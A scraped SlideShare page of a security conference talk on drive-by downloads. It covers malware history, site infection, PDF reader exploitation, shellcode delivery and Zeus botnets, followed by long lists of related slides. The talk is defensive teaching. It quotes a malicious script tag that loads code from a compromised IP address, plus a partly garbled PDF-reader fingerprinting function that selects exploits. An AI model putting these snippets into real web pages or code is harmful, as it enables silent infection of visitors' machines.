SlideShare uma empresa Scribd logo
1 de 34
Baixar para ler offline
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App ,[object Object],Lars Ewe, Cenzic,[object Object],Neil Daswani, Dasient ,[object Object],Session ID: xxx-xxxx,[object Object],Session Classification: xxxxxxxxxxxx,[object Object]
Drive-By via XSS on RSA Conf Website,[object Object],Discovered by Gerry Eisenhaur (Dasient),[object Object],Persistent XSS in Jive,[object Object],“Benign” drive-by injected / Pops up calc.exe,[object Object],Script element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarks,[object Object],Un-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102,[object Object],Yet again -- use of SSL alone does not provide security – code must be made secure also!,[object Object]
Check This Out …,[object Object],Watch,[object Object]
Agenda,[object Object],Quick History of Security ,[object Object],Malware Anatomy & Distribution,[object Object],Lifecycle of Malware Protection,[object Object],Future of Web Security,[object Object]
5,[object Object],Quick History:  Security,[object Object]
Evolution of Security ,[object Object],1980s  ,[object Object],Anti-Virus,[object Object],1986: Brain Virus (Pakistan)  ,[object Object],1990: More viruses – Fish, Flip, Whale.  ,[object Object], 1991-98: Famous Michelangelo. Symantec introduces Norton,[object Object],1998 – 2004:  Internet surge, new viruses =  (Melissa, I love you, Nimda, SQL Slammer, Sobig.F, Naachi, Sasser) cause havoc,[object Object], Over 60K known viruses. Frequent updates provided by vendors.,[object Object],1990s ,[object Object],Network Security,[object Object],[object Object]
 Intrusion Detection Systems (IDS) introduced to monitor anomalous activity
 Intrusion Prevention Systems (IPS) combined IDS & network firewalls
Network vulnerability scanning tools introduced to aid vulnerability management 2000s ,[object Object],Application Security,[object Object],[object Object]
Some vulnerability scanning  tools & WAFs deployed, but security holes remain – especially for custom apps
Drive-by-downloads mature from prototype attacks to mainstream
2007: SQL Injection used to inject malicious drive-by-download code in addition to data theft
2009: Gumblar web worm infects 80K servers, Web malware used in Aurora attack, widget attacks
2010:  Over 1M web sites infected in 1 quarter, large Gov websites hit (NIH, US Treasury, EPA),[object Object]
8,[object Object],Malware Anatomy & Distribution,[object Object]
Step 1: Infect a Site (or 2 or 3 or Thousands!),[object Object],There is no perimeter,[object Object],Web 2.0/ external content,[object Object],Software vulnerabilities,[object Object],Ads (Malvertising),[object Object], Mash-ups,[object Object], Widgets,[object Object], External images,[object Object], User generated content (HTML, images, links, exe, documents),[object Object],[object Object]
XSS
 PHP file include
 Un-patched Software (blog, CMS, shopping cart)Infrastructure vulnerabilities,[object Object],Passwords compromised,[object Object],[object Object]
Network vulnerabilities
FTP credentials
SSH credentials
Web server credentials,[object Object]
Step 1: Inject Really Malicious JavaScript,[object Object]
Step 1: Inject Really Malicious JavaScript,[object Object]
Step 1: Inject Really Malicious JavaScript,[object Object],Sources in malicious JavaScript from a compromised IP!,[object Object],Infects user's machine silently,[object Object],<script id=_0_ src=//218.93.202.61/cp/></script>,[object Object]
Step 2: Invoke Client-Side Vulnerability,[object Object],CVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104,[object Object],CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.,[object Object],CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.,[object Object]
Step 2: Ex. Fingerprint PDF Reader,[object Object],JavaScript generates a zero-size IFRAME in web page sources in a PDF file,[object Object], PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different  than JavaScript interpreter used by browser),[object Object],Attacker needs to determine which version of  the PDF reader / JavaScript interpreter to target,[object Object]
Step 2: Ex. Fingerprint PDF Reader,[object Object],function pdf_start(){var version=app.viewerVersion.toString();version=version.replace(//g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();},[object Object]
Step 3: Deliver Shellcode,[object Object],Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode,[object Object],“Spray” the heap with assembly instructions that give shell access,[object Object],Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email()) ,[object Object]
Step 4: Send ‘Downloader’,[object Object],Example: 2k8.exe,[object Object]
Step 5: Join a Botnet: e.g. Zeus,[object Object]
Zeus Botnet + Targeted Phishing,[object Object],Botnet propagation + Targeted Phishing:,[object Object],http://internetbanking.gad.de/banking/,[object Object],http://hsbc.co.uk,[object Object],http://www.mybank.alliance-leicester.co.uk,[object Object],http://www.citibank.de,[object Object]
What Next?,[object Object],Steal credentials (e.g., Zeus),[object Object],Sell fake anti-virus (e.g., Koobface),[object Object],Steal FTP credentials (e.g., Gumblar),[object Object],Steal corporate secrets (e.g., Aurora),[object Object],Collect fraudulent click revenue (e.g., ClickbotA),[object Object]

Mais conteúdo relacionado

Mais procurados

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-OnsAbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-Onsachettih
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Hacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques UsedHacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques UsedSiddharth Bhattacharya
 
Abusing, Exploiting and Pwning with Firefox Add-ons
Abusing, Exploiting and Pwning with Firefox Add-onsAbusing, Exploiting and Pwning with Firefox Add-ons
Abusing, Exploiting and Pwning with Firefox Add-onsAjin Abraham
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
CBSE class X Computer Applications ch 1 INTERNET
CBSE class X Computer Applications ch 1 INTERNETCBSE class X Computer Applications ch 1 INTERNET
CBSE class X Computer Applications ch 1 INTERNETArchana Dwivedi
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 

Mais procurados (20)

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-OnsAbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Hacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques UsedHacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques Used
 
Abusing, Exploiting and Pwning with Firefox Add-ons
Abusing, Exploiting and Pwning with Firefox Add-onsAbusing, Exploiting and Pwning with Firefox Add-ons
Abusing, Exploiting and Pwning with Firefox Add-ons
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
CBSE class X Computer Applications ch 1 INTERNET
CBSE class X Computer Applications ch 1 INTERNETCBSE class X Computer Applications ch 1 INTERNET
CBSE class X Computer Applications ch 1 INTERNET
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 

Destaque

Cádiz al natural
Cádiz al naturalCádiz al natural
Cádiz al naturalMiNiBuDa
 
Teorias de proyectos web
Teorias de proyectos webTeorias de proyectos web
Teorias de proyectos webLiz Pm
 
I N F O R M E D E Exposición De Tecnologia
I N F O R M E  D E  Exposición De TecnologiaI N F O R M E  D E  Exposición De Tecnologia
I N F O R M E D E Exposición De Tecnologiaguestc2902fa
 
Inbjudan andreas carlgren
Inbjudan andreas carlgrenInbjudan andreas carlgren
Inbjudan andreas carlgrenandreassvensson
 
Ola 13
Ola 13Ola 13
Ola 13olaand
 

Destaque (8)

Administración básica1
Administración básica1Administración básica1
Administración básica1
 
Cádiz al natural
Cádiz al naturalCádiz al natural
Cádiz al natural
 
Skrivaförwebben
SkrivaförwebbenSkrivaförwebben
Skrivaförwebben
 
Teorias de proyectos web
Teorias de proyectos webTeorias de proyectos web
Teorias de proyectos web
 
I N F O R M E D E Exposición De Tecnologia
I N F O R M E  D E  Exposición De TecnologiaI N F O R M E  D E  Exposición De Tecnologia
I N F O R M E D E Exposición De Tecnologia
 
Inbjudan andreas carlgren
Inbjudan andreas carlgrenInbjudan andreas carlgren
Inbjudan andreas carlgren
 
Ola 13
Ola 13Ola 13
Ola 13
 
Session 31 Jan-Erik Swärdh
Session 31 Jan-Erik SwärdhSession 31 Jan-Erik Swärdh
Session 31 Jan-Erik Swärdh
 

Semelhante a Drive By Downloads: How To Avoid Getting a Cap Popped in Your App

Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeKaspersky
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryonePaul Melson
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpJoann Davis
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersSomyos U.
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awarenessJanagi Kannan
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Operations Security - SF Bitcoin Hackday March 2015
Operations Security - SF Bitcoin Hackday March 2015Operations Security - SF Bitcoin Hackday March 2015
Operations Security - SF Bitcoin Hackday March 2015Mikko Ohtamaa
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security TestingAlan Kan
 

Semelhante a Drive By Downloads: How To Avoid Getting a Cap Popped in Your App (20)

News bytes Oct-2011
News bytes  Oct-2011News bytes  Oct-2011
News bytes Oct-2011
 
4.Xss
4.Xss4.Xss
4.Xss
 
Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS Office
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Information security
Information securityInformation security
Information security
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security Perimeters
 
Cisco WebEx vulnerability: it’s a kind of magic
Cisco WebEx vulnerability: it’s a kind of magicCisco WebEx vulnerability: it’s a kind of magic
Cisco WebEx vulnerability: it’s a kind of magic
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Operations Security - SF Bitcoin Hackday March 2015
Operations Security - SF Bitcoin Hackday March 2015Operations Security - SF Bitcoin Hackday March 2015
Operations Security - SF Bitcoin Hackday March 2015
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security Testing
 

Mais de Cenzic

Continuous Monitoring for Web Application Security
Continuous Monitoring for Web Application SecurityContinuous Monitoring for Web Application Security
Continuous Monitoring for Web Application SecurityCenzic
 
How to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security TestingHow to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security TestingCenzic
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Cenzic
 
Ians cenzic webinar
Ians cenzic webinarIans cenzic webinar
Ians cenzic webinarCenzic
 
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Cenzic
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
HARM Score: Approaches to Quantitative Risk Analysis for Web Applications
HARM Score:  Approaches to Quantitative Risk Analysis for Web ApplicationsHARM Score:  Approaches to Quantitative Risk Analysis for Web Applications
HARM Score: Approaches to Quantitative Risk Analysis for Web ApplicationsCenzic
 
AJAX: How to Divert Threats
AJAX:  How to Divert ThreatsAJAX:  How to Divert Threats
AJAX: How to Divert ThreatsCenzic
 

Mais de Cenzic (8)

Continuous Monitoring for Web Application Security
Continuous Monitoring for Web Application SecurityContinuous Monitoring for Web Application Security
Continuous Monitoring for Web Application Security
 
How to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security TestingHow to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security Testing
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
 
Ians cenzic webinar
Ians cenzic webinarIans cenzic webinar
Ians cenzic webinar
 
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
HARM Score: Approaches to Quantitative Risk Analysis for Web Applications
HARM Score:  Approaches to Quantitative Risk Analysis for Web ApplicationsHARM Score:  Approaches to Quantitative Risk Analysis for Web Applications
HARM Score: Approaches to Quantitative Risk Analysis for Web Applications
 
AJAX: How to Divert Threats
AJAX:  How to Divert ThreatsAJAX:  How to Divert Threats
AJAX: How to Divert Threats
 

Último

9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxUdaiappa Ramachandran
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 

Último (20)

9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
